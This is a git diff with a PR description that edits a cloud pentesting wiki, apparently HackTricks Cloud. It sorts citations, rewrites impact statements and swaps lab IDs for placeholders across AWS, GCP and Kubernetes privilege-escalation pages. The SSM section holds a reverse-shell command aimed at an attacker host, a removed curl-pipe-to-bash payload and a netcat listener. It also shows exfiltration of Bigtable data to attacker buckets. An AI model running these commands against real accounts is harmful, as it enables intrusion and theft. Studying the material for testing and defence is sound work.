-With the permission to update a SageMaker Studio User Profile, create an app, a presigned URL to the app and `iam:PassRole`, an attacker can set the `ExecutionRole` to any IAM role that the SageMaker service principal can assume. New Studio apps launched for that profile will run with the swapped role, giving interactive elevated permissions via Jupyter terminals or jobs launched from Studio.<sup>[[19]](#references)[[6]](#references)[[7]](#references)[[8]](#references)</sup>
+With the permission to update a SageMaker Studio User Profile, create an app, a presigned URL to the app and `iam:PassRole`, an attacker can set the `ExecutionRole` to any IAM role that the SageMaker service principal can assume. New Studio apps launched for that profile will run with the swapped role, giving interactive elevated permissions via Jupyter terminals or jobs launched from Studio.<sup>[[6]](#references)[[7]](#references)[[8]](#references)[[19]](#references)</sup>
 
 > [!WARNING]
 > This attack requires that there are no applications in the profile or the app creation will fail with an error similar to: `An error occurred (ValidationException) when calling the UpdateUserProfile operation: Unable to update UserProfile [arn:aws:sagemaker:us-east-1:947247140022:user-profile/d-fcmlssoalfra/test-user-profile-2] with InService App. Delete all InService apps for UserProfile and try again.`
@@ -354,15 +354,15 @@ aws sagemaker create-presigned-domain-url \
 
 ```
 
-**Potential Impact**: Privilege escalation to the permissions of the specified SageMaker execution role for interactive Studio sessions.<sup>[[19]](#references)[[8]](#references)</sup>
+**Potential Impact**: Privilege escalation to the permissions of the specified SageMaker execution role for interactive Studio sessions.<sup>[[8]](#references)[[19]](#references)</sup>
 
 
 ### `sagemaker:UpdateDomain`, `sagemaker:CreateUserProfile`, `sagemaker:CreateApp`, `iam:PassRole`, `sagemaker:CreatePresignedDomainUrl`, (`sagemaker:DeleteApp`)
 
-With permissions to update a SageMaker Studio Domain, create a user profile and app, generate a presigned URL to the app, and use `iam:PassRole`, an attacker can set the default domain `ExecutionRole` for new profiles to any IAM role that the SageMaker service principal can assume. A profile created after the change without an explicit role override inherits the swapped default, and its new Studio apps can then provide interactive elevated permissions via Jupyter terminals or jobs launched from Studio.<sup>[[21]](#references)[[27]](#references)[[6]](#references)[[8]](#references)</sup>
+With permissions to update a SageMaker Studio Domain, create a user profile and app, generate a presigned URL to the app, and use `iam:PassRole`, an attacker can set the default domain `ExecutionRole` for new profiles to any IAM role that the SageMaker service principal can assume. A profile created after the change without an explicit role override inherits the swapped default, and its new Studio apps can then provide interactive elevated permissions via Jupyter terminals or jobs launched from Studio.<sup>[[6]](#references)[[8]](#references)[[21]](#references)[[27]](#references)</sup>
 
 > [!WARNING]
-> This attack requires that there are no applications in the domain or the app creation will fail with the error: `An error occurred (ValidationException) when calling the UpdateDomain operation: Unable to update Domain [arn:aws:sagemaker:us-east-1:947247140022:domain/d-fcmlssoalfra] with InService App. Delete all InService apps in the domain including shared Apps for [domain-shared] User Profile, and try again.`<sup>[[21]](#references)[[19]](#references)[[20]](#references)</sup>
+> This attack requires that there are no applications in the domain or the app creation will fail with the error: `An error occurred (ValidationException) when calling the UpdateDomain operation: Unable to update Domain [arn:aws:sagemaker:us-east-1:947247140022:domain/d-fcmlssoalfra] with InService App. Delete all InService apps in the domain including shared Apps for [domain-shared] User Profile, and try again.`<sup>[[19]](#references)[[20]](#references)[[21]](#references)</sup>
 
 Steps:
 
@@ -420,11 +420,11 @@ aws sagemaker create-presigned-domain-url \
 #    (should show the high-privilege role from domain defaults)
 ```
 
-**Potential Impact**: Privilege escalation to the permissions of the specified SageMaker execution role for interactive Studio sessions.<sup>[[19]](#references)[[21]](#references)[[8]](#references)</sup>
+**Potential Impact**: Privilege escalation to the permissions of the specified SageMaker execution role for interactive Studio sessions.<sup>[[8]](#references)[[19]](#references)[[21]](#references)</sup>
 
 ### `sagemaker:CreateApp`, `sagemaker:CreatePresignedDomainUrl`
 
-An attacker with permission to create a SageMaker Studio app for a target UserProfile can launch a JupyterServer app that runs with the profile's `ExecutionRole`. This provides interactive access to the role's permissions via Jupyter terminals or jobs launched from Studio.<sup>[[19]](#references)[[5]](#references)[[8]](#references)</sup>
+An attacker with permission to create a SageMaker Studio app for a target UserProfile can launch a JupyterServer app that runs with the profile's `ExecutionRole`. This provides interactive access to the role's permissions via Jupyter terminals or jobs launched from Studio.<sup>[[5]](#references)[[8]](#references)[[19]](#references)</sup>
 
 Steps:
 
@@ -452,7 +452,7 @@ aws sagemaker create-presigned-domain-url \
 #    aws sts get-caller-identity
 ```
 
-**Potential Impact**: Interactive access to the SageMaker execution role attached to the target UserProfile.<sup>[[5]](#references)[[19]](#references)[[8]](#references)</sup>
+**Potential Impact**: Interactive access to the SageMaker execution role attached to the target UserProfile.<sup>[[5]](#references)[[8]](#references)[[19]](#references)</sup>
 
 
 ### `datazone:CreateUserProfile` (and `iam:GetUser` for project assignment without an existing profile)

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc/README.md
@@ -22,7 +22,7 @@ aws ssm describe-sessions --state Active
 # Send rev shell command
 aws ssm send-command --instance-ids "$INSTANCE_ID" \
    --document-name "AWS-RunShellScript" --output text \
-   --parameters commands="curl https://reverse-shell.sh/4.tcp.ngrok.io:16084 | bash"
+   --parameters commands="bash -c 'bash -i >& /dev/tcp/<attacker-host>/<port> 0>&1'"
 ```
 
 In case you are using this technique to escalate privileges inside an already compromised EC2 instance, you could just capture the rev shell locally with:
@@ -32,10 +32,10 @@ In case you are using this technique to escalate privileges inside an already co
 nc -lvnp 4444 #Inside the EC2 instance
 aws ssm send-command --instance-ids "$INSTANCE_ID" \
    --document-name "AWS-RunShellScript" --output text \
-   --parameters commands="curl https://reverse-shell.sh/127.0.0.1:4444 | bash"
+   --parameters commands="bash -c 'bash -i >& /dev/tcp/127.0.0.1/4444 0>&1'"
 ```
 
-**Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running.<sup>[[4]](#references)[[5]](#references)</sup>
+**Potential Impact:** Remote command execution can expose the instance profile of the targeted managed node.<sup>[[4]](#references)[[5]](#references)</sup>
 
 ### `ssm:StartSession`
 
@@ -55,7 +55,7 @@ aws ssm start-session --target "$INSTANCE_ID"
 > [!CAUTION]
 > In order to start a session you need the **SessionManagerPlugin** installed: [https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html](https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html)<sup>[[8]](#references)[[9]](#references)</sup>
 
-**Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running.<sup>[[4]](#references)[[5]](#references)</sup>
+**Potential Impact:** An interactive Session Manager shell can expose the instance profile of the targeted managed node.<sup>[[4]](#references)[[5]](#references)</sup>
 
 #### Privesc to ECS
 
@@ -86,7 +86,7 @@ aws ssm resume-session \
     --session-id Mary-Major-07a16060613c408b5
 ```
 
-**Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running and disconected sessions.<sup>[[4]](#references)[[5]](#references)[[12]](#references)</sup>
+**Potential Impact:** Resuming a disconnected session can restore guest access and expose that node's instance profile.<sup>[[4]](#references)[[5]](#references)[[12]](#references)</sup>
 
 ### `ssm:DescribeParameters`, (`ssm:GetParameter` | `ssm:GetParameters`)
 

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc/README.md
@@ -63,7 +63,7 @@ aws stepfunctions test-state --definition file://stateDefinition.json --role-arn
 }
 ```
 
-**Potential Impact**: Unauthorized execution and manipulation of workflows and access to sensitive resources, potentially leading to significant security breaches.
+**Potential Impact:** `TestState` can execute a single attacker-supplied state with the passed role and return sensitive API results directly.
 
 ### `states:CreateStateMachine` & `iam:PassRole` & (`states:StartExecution` | `states:StartSyncExecution`)
 
@@ -146,7 +146,7 @@ aws stepfunctions start-execution --state-machine-arn arn:aws:states:us-east-1:1
 > [!WARNING]
 > The attacker-controlled S3 bucket should have permissions to accept an s3:PutObject action from the victim account.<sup>[[11]](#references)</sup>
 
-**Potential Impact**: Unauthorized execution and manipulation of workflows and access to sensitive resources, potentially leading to significant security breaches.
+**Potential Impact:** A new state machine can execute attacker-selected AWS integrations with the passed role and exfiltrate their output.
 
 ### `states:UpdateStateMachine` & (not always required) `iam:PassRole`
 
@@ -246,7 +246,7 @@ aws stepfunctions update-state-machine --state-machine-arn arn:aws:states:us-eas
 }
 ```
 
-**Potential Impact**: Unauthorized execution and manipulation of workflows and access to sensitive resources, potentially leading to significant security breaches.
+**Potential Impact:** A modified workflow can perform hidden privileged actions the next time a legitimate execution reaches the injected state.
 
 ## References
 
@@ -266,4 +266,3 @@ aws stepfunctions update-state-machine --state-machine-arn arn:aws:states:us-eas
 - [14] [Intrinsic functions for JSONPath states in Step Functions](https://docs.aws.amazon.com/step-functions/latest/dg/intrinsic-functions.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-

--- a/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md
@@ -296,7 +296,7 @@ Prefer `append` or `remove` on internet-facing ALBs, and avoid using client-cont
 
 #### Useful tool
 
-[**ELBaph**](https://github.com/doyensec/ELBaph) is a read-only auditor that models **ALBs, NLBs, listeners, rules, target groups, and targets as a routing graph** and then probes for reachable exposures.<sup>[[6]](#references)[[2]](#references)</sup>
+[**ELBaph**](https://github.com/doyensec/ELBaph) is a read-only auditor that models **ALBs, NLBs, listeners, rules, target groups, and targets as a routing graph** and then probes for reachable exposures.<sup>[[2]](#references)[[6]](#references)</sup>
 
 ```bash
 elbaph scan --region us-east-1

--- a/src/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md
@@ -27,7 +27,7 @@ Pacu's `ecs__enum` module can enumerate ECS clusters, container instances, servi
 
 ### Enumeration
 
-The AWS CLI operations below map to the ECS List and Describe APIs. Inspect the responses for task roles, container settings, environment variables, and secret references.<sup>[[9]](#references)[[10]](#references)[[7]](#references)</sup>
+The AWS CLI operations below map to the ECS List and Describe APIs. Inspect the responses for task roles, container settings, environment variables, and secret references.<sup>[[7]](#references)[[9]](#references)[[10]](#references)</sup>
 
 ```bash
 # Clusters info
@@ -85,7 +85,7 @@ tr -s '{}[],:"\\' '\n' < /tmp/agent.txt | sed 's/^[[:space:]]*//; s/[[:space:]]*
 Depending on the agent version, local cleanup settings, and workload churn, `strings` against `agent.db` may yield:
 
 - **Task and credential metadata** — task records include task and execution credential identifiers, while containers with task roles receive an `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI` value. AWS documents retrieving task-role credentials from `169.254.170.2` by using that relative URI from inside the task; see the [task metadata endpoint guidance](https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html).<sup>[[14]](#references)[[19]](#references)</sup>
-- **Task and container configuration** — image URIs, commands, entrypoints, port mappings, mount points, and environment maps can be serialized in agent state. Plaintext environment values may therefore include database URLs, API tokens, or other application secrets when they were configured that way.<sup>[[13]](#references)[[14]](#references)[[7]](#references)</sup>
+- **Task and container configuration** — image URIs, commands, entrypoints, port mappings, mount points, and environment maps can be serialized in agent state. Plaintext environment values may therefore include database URLs, API tokens, or other application secrets when they were configured that way.<sup>[[7]](#references)[[13]](#references)[[14]](#references)</sup>
 - **Secret and registry references** — the container state model includes secret references and private-registry authentication metadata such as the Secrets Manager parameter and region. The current model does not serialize its runtime ECR pull credentials, so do not assume reusable registry passwords are present in `agent.db`.<sup>[[7]](#references)[[13]](#references)[[14]](#references)[[17]](#references)</sup>
 - **Cluster, container-instance, and network metadata** — the agent persists cluster and container-instance metadata, while ENI records can contain interface IDs, MAC addresses, private IP addresses, subnet-gateway information, and DNS fields.<sup>[[16]](#references)[[18]](#references)</sup>
 - **Legacy agent configuration** — EC2 agent setups may use `ECS_ENGINE_AUTH_DATA` for Docker registry authentication; inspect the agent configuration separately because this setting is not evidence that the auth material is stored in `agent.db`.<sup>[[11]](#references)</sup>

--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md
@@ -297,7 +297,7 @@ A 10-second period is intended for high-resolution custom metrics; a standard EC
 {{#endtab }}
 {{#endtabs }}
 
-**Potential Impact**: Lack of notifications for critical events, potential undetected issues, false alerts, suppress genuine alerts and potentially missed detections of real incidents.
+**Potential Impact:** Reconfigured alarms can raise false positives, hide real threshold breaches, or redirect automated actions.
 
 ### **`cloudwatch:DisableAlarmActions`, `cloudwatch:EnableAlarmActions`, `cloudwatch:SetAlarmState`**
 
@@ -313,7 +313,7 @@ aws cloudwatch enable-alarm-actions --alarm-names <value>
 aws cloudwatch set-alarm-state --alarm-name <value> --state-value <OK | ALARM | INSUFFICIENT_DATA> --state-reason <value> [--state-reason-data <value>]
 ```
 
-**Potential Impact**: Lack of notifications for critical events, potential undetected issues, false alerts, suppress genuine alerts and potentially missed detections of real incidents.
+**Potential Impact:** Disabling actions suppresses notifications and remediation, while forced alarm states can create distractions or misleading telemetry.
 
 ### **`cloudwatch:DeleteAnomalyDetector`, `cloudwatch:PutAnomalyDetector`**
 

--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md
@@ -251,7 +251,7 @@ aws fms put-apps-list --apps-list <value> [--tag-list <value>]
 aws fms delete-apps-list --list-id <value>
 ```
 
-**Potential Impact:** This could result in misconfigurations, policy evasion, compliance violations, and disruption of security controls within the environment.
+**Potential Impact:** Altered application lists can expose disallowed applications or block legitimate traffic, causing policy bypass or denial of service.
 
 ### `fms:PutProtocolsList`, `fms:DeleteProtocolsList`
 
@@ -264,7 +264,7 @@ aws fms put-protocols-list --protocols-list <value> [--tag-list <value>]
 aws fms delete-protocols-list --list-id <value>
 ```
 
-**Potential Impact:** This could result in misconfigurations, policy evasion, compliance violations, and disruption of security controls within the environment.
+**Potential Impact:** Altered protocol lists can permit prohibited protocols or deny approved ones, weakening enforcement or disrupting connectivity.
 
 ### `fms:PutNotificationChannel`, `fms:DeleteNotificationChannel`
 

--- a/src/pentesting-cloud/confidential-computing/luks2-header-malleability-null-cipher-abuse.md
+++ b/src/pentesting-cloud/confidential-computing/luks2-header-malleability-null-cipher-abuse.md
@@ -66,7 +66,7 @@ Then enforce one (or more) of:
 1) MAC the full header
    - Compute/verify a MAC over the entire header prior to use.
    - Only open the volume when the MAC verifies.
-   - Examples in the wild: Flashbots tdx-init and Fortanix Salmiac adopted MAC-based verification.<sup>[[8]](#references)[[9]](#references)[[1]](#references)</sup>
+   - Examples in the wild: Flashbots tdx-init and Fortanix Salmiac adopted MAC-based verification.<sup>[[1]](#references)[[8]](#references)[[9]](#references)</sup>
 
 2) Strict JSON validation (backward compatible)
    - Dump JSON metadata and validate a strict allowlist of parameters (KDF, ciphers, segment count/type, flags).<sup>[[1]](#references)</sup>

--- a/src/pentesting-cloud/gcp-security/README.md
+++ b/src/pentesting-cloud/gcp-security/README.md
@@ -131,7 +131,7 @@ gcp-unauthenticated-enum-and-access/
 
 The most common way once you have obtained some cloud credentials or have compromised some service running inside a cloud is to **abuse misconfigured privileges** the compromised account may have. So, the first thing you should do is to enumerate your privileges.
 
-Moreover, during this enumeration, remember that **permissions can be set at the highest level of "Organization"** as well.<sup>[[2]](#references)[[1]](#references)</sup>
+Moreover, during this enumeration, remember that **permissions can be set at the highest level of "Organization"** as well.<sup>[[1]](#references)[[2]](#references)</sup>
 
 {{#ref}}
 gcp-privilege-escalation/

--- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-bigtable-post-exploitation.md
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-bigtable-post-exploitation.md
@@ -87,13 +87,13 @@ gcloud dataflow jobs run <job-name> \
   --parameters=<PROJECT>,bigtableInstanceId=<INSTANCE_ID>,bigtableTableId=<TABLE_ID>,filenamePrefix=<PREFIX>,outputDirectory=gs://<BUCKET>/raw-json/ \
   --staging-location=gs://<BUCKET>/staging/
 
-# Example
-gcloud dataflow jobs run dump-bigtable3 \
+# Example using placeholders
+gcloud dataflow jobs run <job-name> \
   --gcs-location=gs://dataflow-templates-us-central1/latest/Cloud_Bigtable_to_GCS_Json \
-  --project=gcp-labs-3uis1xlx \
+  --project=<project-id> \
   --region=us-central1 \
-  --parameters=bigtableProjectId=gcp-labs-3uis1xlx,bigtableInstanceId=avesc-20251118172913,bigtableTableId=prod-orders,filenamePrefix=prefx,outputDirectory=gs://deleteme20u9843rhfioue/raw-json/ \
-  --staging-location=gs://deleteme20u9843rhfioue/staging/
+  --parameters=bigtableProjectId=<project-id>,bigtableInstanceId=<instance-id>,bigtableTableId=<table-id>,filenamePrefix=<prefix>,outputDirectory=gs://<bucket>/raw-json/ \
+  --staging-location=gs://<bucket>/staging/
 ```
 
 </details>
@@ -106,14 +106,14 @@ gcloud dataflow jobs run dump-bigtable3 \
 
 ### Import rows
 
-**Permissions:** `dataflow.jobs.create`, `resourcemanager.projects.get`, `iam.serviceAccounts.actAs`<sup>[[4]](#references)[[5]](#references)</sup>
+**Permissions:** The import path needs the same `dataflow.jobs.create`, `resourcemanager.projects.get`, and `iam.serviceAccounts.actAs` permissions as the export path.<sup>[[4]](#references)[[5]](#references)</sup>
 
 It's possible to import the contents of an entire table from a bucket controlled by the attacker by launching a Dataflow job that streams rows into a GCS bucket you control. For this the attacker will first need to create a parquet file with the data to be imported with the expected schema. An attacker could first export the data in parquet format following the previous technique with the setting `Cloud_Bigtable_to_GCS_Parquet` and add new entries into the downloaded parquet file<sup>[[9]](#references)</sup>
 
 
 
 > [!NOTE]
-> Note that you will need the permission `iam.serviceAccounts.actAs` over a some SA with enough permissions to perform the export (by default, if not aindicated otherwise, the default compute SA will be used).<sup>[[5]](#references)</sup>
+> `iam.serviceAccounts.actAs` must apply to a service account that can read the import objects and write to the destination table. If no worker service account is specified, Dataflow uses the Compute Engine default service account.<sup>[[5]](#references)</sup>
 
 <details>
 
@@ -122,18 +122,18 @@ It's possible to import the contents of an entire table from a bucket controlled
 ```bash
 gcloud dataflow jobs run import-bt-$(date +%s) \
   --region=<REGION> \
-  --gcs-location=gs://dataflow-templates-<REGION>/<VERSION>>/GCS_Parquet_to_Cloud_Bigtable \
+  --gcs-location=gs://dataflow-templates-<REGION>/<VERSION>/GCS_Parquet_to_Cloud_Bigtable \
   --project=<PROJECT> \
   --parameters=bigtableProjectId=<PROJECT>,bigtableInstanceId=<INSTANCE-ID>,bigtableTableId=<TABLE-ID>,inputFilePattern=gs://<BUCKET>/import/bigtable_import.parquet \
   --staging-location=gs://<BUCKET>/staging/
 
-# Example
+# Example using placeholders
 gcloud dataflow jobs run import-bt-$(date +%s) \
   --region=us-central1 \
   --gcs-location=gs://dataflow-templates-us-central1/latest/GCS_Parquet_to_Cloud_Bigtable \
-  --project=gcp-labs-3uis1xlx \
-  --parameters=bigtableProjectId=gcp-labs-3uis1xlx,bigtableInstanceId=avesc-20251118172913,bigtableTableId=prod-orders,inputFilePattern=gs://deleteme20u9843rhfioue/import/parquet_prefx-00000-of-00001.parquet \
-  --staging-location=gs://deleteme20u9843rhfioue/staging/
+  --project=<project-id> \
+  --parameters=bigtableProjectId=<project-id>,bigtableInstanceId=<instance-id>,bigtableTableId=<table-id>,inputFilePattern=gs://<bucket>/import/<file>.parquet \
+  --staging-location=gs://<bucket>/staging/
 ```
 
 </details>
@@ -258,10 +258,10 @@ from google.cloud.bigtable_v2 import BigtableClient as DataClient
 from google.cloud.bigtable_v2 import ReadRowsRequest
 
 # Set your project, instance, table, view id
-PROJECT_ID = "gcp-labs-3uis1xlx"
-INSTANCE_ID = "avesc-20251118172913"
-TABLE_ID = "prod-orders"
-AUTHORIZED_VIEW_ID = "auth_view"
+PROJECT_ID = "<project-id>"
+INSTANCE_ID = "<instance-id>"
+TABLE_ID = "<table-id>"
+AUTHORIZED_VIEW_ID = "<authorized-view-id>"
 
 client = bigtable.Client(project=PROJECT_ID, admin=True)
 instance = client.instance(INSTANCE_ID)

--- a/src/pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.md
+++ b/src/pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.md
@@ -22,17 +22,17 @@ done | grep -v "ClusterIP"
 
 A **ClusterIP** service is the **default** Kubernetes **service**. It gives you a **service inside** your cluster that other apps inside your cluster can access. There is **no external access**.<sup>[[2]](#references)</sup>
 
-However, this can be accessed using the Kubernetes Proxy:<sup>[[13]](#references)[[1]](#references)</sup>
+However, this can be accessed using the Kubernetes Proxy:<sup>[[1]](#references)[[13]](#references)</sup>
 
 ```bash
 kubectl proxy --port=8080
 ```
 
-Now, you can navigate through the Kubernetes API to access services using this scheme:<sup>[[13]](#references)[[1]](#references)</sup>
+Now, you can navigate through the Kubernetes API to access services using this scheme:<sup>[[1]](#references)[[13]](#references)</sup>
 
 `http://localhost:8080/api/v1/proxy/namespaces/<NAMESPACE>/services/<SERVICE-NAME>:<PORT-NAME>/`
 
-For example you could use the following URL:<sup>[[13]](#references)[[1]](#references)</sup>
+For example you could use the following URL:<sup>[[1]](#references)[[13]](#references)</sup>
 
 `http://localhost:8080/api/v1/proxy/namespaces/default/services/my-internal-service:http/`
 
@@ -54,7 +54,7 @@ spec:
       protocol: TCP
 ```
 
-_This method requires you to run `kubectl` as an **authenticated user**._<sup>[[13]](#references)[[1]](#references)</sup>
+_This method requires you to run `kubectl` as an **authenticated user**._<sup>[[1]](#references)[[13]](#references)</sup>
 
 List all ClusterIPs:
 
@@ -64,7 +64,7 @@ kubectl get services --all-namespaces -o=custom-columns='NAMESPACE:.metadata.nam
 
 ### NodePort
 
-When **NodePort** is utilised, a designated port is made available on all Nodes (representing the Virtual Machines). **Traffic** directed to this specific port is then systematically **routed to the service**. Typically, this method is not recommended due to its drawbacks.<sup>[[2]](#references)[[1]](#references)</sup>
+When **NodePort** is utilised, a designated port is made available on all Nodes (representing the Virtual Machines). **Traffic** directed to this specific port is then systematically **routed to the service**. Typically, this method is not recommended due to its drawbacks.<sup>[[1]](#references)[[2]](#references)</sup>
 
 List all NodePorts:
 
@@ -72,7 +72,7 @@ List all NodePorts:
 kubectl get services --all-namespaces -o=custom-columns='NAMESPACE:.metadata.namespace,NAME:.metadata.name,TYPE:.spec.type,CLUSTER-IP:.spec.clusterIP,PORT(S):.spec.ports[*].port,NODEPORT(S):.spec.ports[*].nodePort,TARGETPORT(S):.spec.ports[*].targetPort,SELECTOR:.spec.selector' | grep NodePort
 ```
 
-An example of NodePort specification:<sup>[[2]](#references)[[1]](#references)</sup>
+An example of NodePort specification:<sup>[[1]](#references)[[2]](#references)</sup>
 
 ```yaml
 apiVersion: v1
@@ -193,13 +193,13 @@ When reviewing exposure, compare the Service selector with the EndpointSlice `ta
 
 ### Ingress
 
-Unlike all the above examples, **Ingress is NOT a type of service**. Instead, it sits **in front of multiple services and act as a “smart router”** or entrypoint into your cluster.<sup>[[2]](#references)[[1]](#references)</sup>
+Unlike all the above examples, **Ingress is NOT a type of service**. Instead, it sits **in front of multiple services and act as a “smart router”** or entrypoint into your cluster.<sup>[[1]](#references)[[2]](#references)</sup>
 
 You can do a lot of different things with an Ingress, and there are **many types of Ingress controllers that have different capabilities**.<sup>[[1]](#references)</sup>
 
 The default GKE ingress controller will spin up a [HTTP(S) Load Balancer](https://cloud.google.com/compute/docs/load-balancing/http/) for you. This will let you do both path based and subdomain based routing to backend services. For example, you can send everything on foo.yourdomain.com to the foo service, and everything under the yourdomain.com/bar/ path to the bar service.<sup>[[19]](#references)</sup>
 
-The YAML for a Ingress object on GKE with a [L7 HTTP Load Balancer](https://cloud.google.com/compute/docs/load-balancing/http/) might look like this:<sup>[[19]](#references)[[1]](#references)</sup>
+The YAML for a Ingress object on GKE with a [L7 HTTP Load Balancer](https://cloud.google.com/compute/docs/load-balancing/http/) might look like this:<sup>[[1]](#references)[[19]](#references)</sup>
 
 ```yaml
 apiVersion: networking.k8s.io/v1

--- a/src/pentesting-cloud/kubernetes-security/kubernetes-hardening/README.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-hardening/README.md
@@ -284,7 +284,7 @@ kubernetes-securitycontext-s.md
 ### Kubernetes API Hardening
 
 It's very important to **protect the access to the Kubernetes Api Server** as a malicious actor with enough privileges could be able to abuse it and damage in a lot of way the environment.<sup>[[21]](#references)</sup>\
-It's important to secure both the **access** (**whitelist** origins to access the API Server and deny any other connection) and the [**authentication**](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-authentication-authorization/) (following the principle of **least** **privilege**). And definitely **never** **allow** **anonymous** **requests**.<sup>[[21]](#references)[[19]](#references)</sup>
+It's important to secure both the **access** (**whitelist** origins to access the API Server and deny any other connection) and the [**authentication**](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-authentication-authorization/) (following the principle of **least** **privilege**). And definitely **never** **allow** **anonymous** **requests**.<sup>[[19]](#references)[[21]](#references)</sup>
 
 The current kubelet authentication and authorization guidance is documented [here](https://kubernetes.io/docs/reference/access-authn-authz/kubelet-authn-authz/).<sup>[[19]](#references)</sup>
 

--- a/src/pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.md
@@ -376,7 +376,7 @@ In summary: if it's possible to **access the EKS Node IAM role** from a pod, it'
 
 For more info check [this post](https://blog.calif.io/p/privilege-escalation-in-eks). As summary, the default IAM EKS role that is assigned to the EKS nodes by default is assigned the role `system:node` inside the cluster. This role is very interesting although is limited by the kubernetes [**Node Restrictions**](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#noderestriction).<sup>[[20]](#references)[[21]](#references)</sup>
 
-However, the node can always **generate tokens for service accounts** running in pods inside the node. So, if the node is running a pod with a privileged service account, the node can generate a token for that service account and use it to impersonate the service account like in:<sup>[[20]](#references)[[14]](#references)</sup>
+However, the node can always **generate tokens for service accounts** running in pods inside the node. So, if the node is running a pod with a privileged service account, the node can generate a token for that service account and use it to impersonate the service account like in:<sup>[[14]](#references)[[20]](#references)</sup>
 
 ```bash
 kubectl --context=node1 create token -n ns1 sa-priv \


### PR DESCRIPTION
## Summary
- sort multi-source superscript citations numerically across previously audited pages
- remove exact duplicate prose while preserving section-specific meaning
- sanitize stale concrete callback and lab identifiers found during the final audit

## Validation
- structural citation audit across SUMMARY pages 1-550: 0 failures
- duplicate-prose audit across pages 1-550: 0 failures
- git diff --check